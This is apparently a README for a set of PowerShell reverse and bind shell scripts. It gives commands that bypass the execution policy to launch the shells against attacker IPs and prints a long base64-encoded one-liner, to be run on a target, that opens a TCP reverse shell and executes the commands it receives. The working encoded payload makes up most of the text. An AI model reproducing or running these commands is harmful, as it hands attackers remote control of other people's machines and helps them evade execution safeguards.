Selection of reverse shells written in powershell
If the system allows it you might be able to just execute the scripts with the required arguments, but usually you will need to bypass the execution policy, illustrated below.
powershell.exe -ExecutionPolicy ByPass "&.\reverse_tcp.ps1 -server 10.10.10.10 -port 9001"
powershell.exe -ExecutionPolicy ByPass "&.\bind_tcp.ps1 -port 9001"
powershell.exe -ExecutionPolicy ByPass "&.\reverse_http.ps1 -server 10.10.10.10 -port 8080"If you are unable to bypass the execution policy, or it is easier for you to just execute a one-liner (unable or hard to download/execute scripts) then you can use the generate_encoded_reverse_tcp.ps1 script to generate a powershell one-liner version of the reverse_tcp.ps1 script. This will generate a single line line of base64 encoded powershell.
For example, generate the reverse shell base64 from your own computer:
powershell.exe -ExecutionPolicy ByPass "&.\generate_encoded_reverse_tcp.ps1 -s 192.168.0.157 -p 9001"The output is (which you can run on target):
powershell.exe -EncodedCommand JABzAGUAcgB2AGUAcgAgAD0AIAAiADEAOQAyAC4AMQA2ADgALgAwAC4AMQA1ADcAIgANAAoAJABwAG8AcgB0ACAAPQAgADkAMAAwADEADQAKACQAVwBBAEkAVABfAE0AUwAgAD0AIAA1ADAAMAANAAoAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBDAG8AbgBuAGUAYwB0AGkAbwBuAC0AUwB0AGEAdABlACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0AF0AIAAkAGMAbwBuAG4AZQBjAHQAaQBvAG4AKQAgAHsADQAKACAAIAAgACAAJABjAG8AbgBuAGUAYwB0AGkAbwBuAF8AcAByAG8AcABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAE4AZQB0AHcAbwByAGsASQBuAGYAbwByAG0AYQB0AGkAbwBuAC4ASQBQAEcAbABvAGIAYQBsAFAAcgBvAHAAZQByAHQAaQBlAHMAXQA6ADoADQAKACAAIAAgACAARwBlAHQASQBQAEcAbABvAGIAYQBsAFAAcgBvAHAAZQByAHQAaQBlAHMAKAApAC4ARwBlAHQAQQBjAHQAaQB2AGUAVABjAHAAQwBvAG4AbgBlAGMAdABpAG8AbgBzACgAKQAuAFcAaABlAHIAZQAoACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABfAC4ATABvAGMAYQBsAEUAbgBkAFAAbwBpAG4AdAAgAC0AZQBxACAAJABjAG8AbgBuAGUAYwB0AGkAbwBuAC4AQwBsAGkAZQBuAHQALgBMAG8AYwBhAGwARQBuAGQAUABvAGkAbgB0ACAALQBhAG4AZAAgACQAXwAuAFIAZQBtAG8AdABlAEUAbgBkAFAAbwBpAG4AdAAgAC0AZQBxACAAJABjAG8AbgBuAGUAYwB0AGkAbwBuAC4AQwBsAGkAZQBuAHQALgBSAGUAbQBvAHQAZQBFAG4AZABQAG8AaQBuAHQADQAKACAAIAAgACAAIAAgACAAIAB9ACkADQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAGMAbwBuAG4AZQBjAHQAaQBvAG4AXwBwAHIAbwBwAHMALgBTAHQAYQB0AGUADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0AQwBtAGQAKABbAHMAdAByAGkAbgBnAF0AIAAkAGMAbwBtAG0AYQBuAGQAKQAgAHsADQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAIgAiAA0ACgAgACAAIAAgAGkAZgAgACgAJABjAG8AbQBtAGEAbgBkACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdAByAHkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAYgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbwBtAG0AYQBuAGQAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADYANABjAG8AbQBtAGEAbgBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYwBvAG0AbQBhAG4AZABiAHkAdABlAHMAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAJABiAGEAcwBlADYANABjAG8AbQBtAGEAbgBkACIAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABlAHIAcgBvAHIAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAHIAZQBzAHAAbwBuAHMAZQANAAoAfQANAAoAJABjAG8AbgBuAGUAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0ACgAJABzAGUAcgB2AGUAcgAsACAAJABwAG8AcgB0ACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAG8AbgBuAGUAYwB0AGkAbwBuAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApAA0ACgAkAHIAZQBhAGQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABzAHQAcgBlAGEAbQApAA0ACgAkAHcAcgBpAHQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACgAJABzAHQAcgBlAGEAbQApAA0ACgAkAHcAcgBpAHQAZQByAC4AQQB1AHQAbwBGAGwAdQBzAGgAIAA9ACAAJAB0AHIAdQBlAA0ACgAkAGMAbwBuAG4AZQBjAHQAZQBkACAAPQAgACQAdAByAHUAZQANAAoAdwBoAGkAbABlACAAKAAkAGMAbwBuAG4AZQBjAHQAZQBkACkAIAB7AA0ACgAgACAAIAAgAGkAZgAgACgAJABzAHQAcgBlAGEAbQAuAEQAYQB0AGEAQQB2AGEAaQBsAGEAYgBsAGUAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQATABpAG4AZQAoACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAEMAbQBkACAAJAByAGUAcQB1AGUAcwB0AA0ACgAgACAAIAAgAGkAZgAgACgAJAByAGUAcwBwAG8AbgBzAGUAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlACgAJAByAGUAcwBwAG8AbgBzAGUAKQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAYwBvAG4AbgBlAGMAdABpAG8AbgBfAHMAdABhAHQAZQAgAD0AIABHAGUAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4ALQBTAHQAYQB0AGUAIAAkAGMAbwBuAG4AZQBjAHQAaQBvAG4ADQAKACAAIAAgACAAJABjAG8AbgBuAGUAYwB0AGUAZAAgAD0AIAAoACQAYwBvAG4AbgBlAGMAdABpAG8AbgBfAHMAdABhAHQAZQAgAC0AZQBxACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ATgBlAHQAdwBvAHIAawBJAG4AZgBvAHIAbQBhAHQAaQBvAG4ALgBUAEMAUABTAHQAYQB0AGUAXQA6ADoARQBzAHQAYQBiAGwAaQBzAGgAZQBkACkADQAKACAAIAAgACAAJAByAGUAcQB1AGUAcwB0ACAAPQAgACIAIgANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIAAiACIADQAKACAAIAAgACAAcwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgACQAVwBBAEkAVABfAE0AUwANAAoAfQANAAoAJAByAGUAYQBkAGUAcgAuAEMAbABvAHMAZQAoACkADQAKACQAdwByAGkAdABlAHIALgBDAGwAbwBzAGUAKAApAA0ACgAkAGMAbwBuAG4AZQBjAHQAaQBvAG4ALgBDAGwAbwBzAGUAKAApAA0ACgA=